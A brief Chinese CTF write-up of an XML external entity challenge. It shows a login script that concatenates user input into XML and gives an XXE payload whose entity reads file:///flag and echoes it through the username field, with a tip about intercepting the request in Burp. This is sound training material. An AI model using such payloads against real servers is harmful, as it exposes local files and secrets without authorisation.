题目源代码
function doLogin(){var username = $("#username").val();var password = $("#password").val();if(username == "" || password == ""){alert("Please enter the username and password!");return;}var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; $.ajax({type: "POST",url: "doLogin.php",contentType: "application/xml;charset=utf-8",data: data,dataType: "xml",anysc: false,success: function (result) {var code = result.getElementsByTagName("code")[0].childNodes[0].nodeValue;var msg = result.getElementsByTagName("msg")[0].childNodes[0].nodeValue;if(code == "0"){$(".msg").text(msg + " login fail!");}else if(code == "1"){$(".msg").text(msg + " login success!");}else{$(".msg").text("error:" + msg);}},error: function (XMLHttpRequest,textStatus,errorThrown) {$(".msg").text(errorThrown + ':' + textStatus);}});
}
漏洞点:
var data = "<user><username>" + username + "</username><password>" + password + "</password></user>"; 可以自己构造xml语句填进去,导致xml注入,而且在TIPS中会显示(用户名)登录错误
会回显用户名,以用户名作为回显位,回显flag
构造payload,这样登录错误就会在<msg>里面显示用户名,但是用户名引用了XML外部实体,所以会显示file:///flag的内容
<!DOCTYPE note [<!ENTITY xxe SYSTEM "file:///flag">]>定义外部实体的名字以及地址
<!DOCTYPE note [<!ENTITY xxe SYSTEM "file:///flag">
]>
<user>
<username>
&xxe; //注意这里有 ;
</username>
<password>111</password></user>
一开始笨了吧唧的光在输入框里构造payload了,完全忘了还可以bp抓包,把<!DOCTYPE note [
<!ENTITY xxe SYSTEM "file:///flag">]>放到前面去,任意修改位置
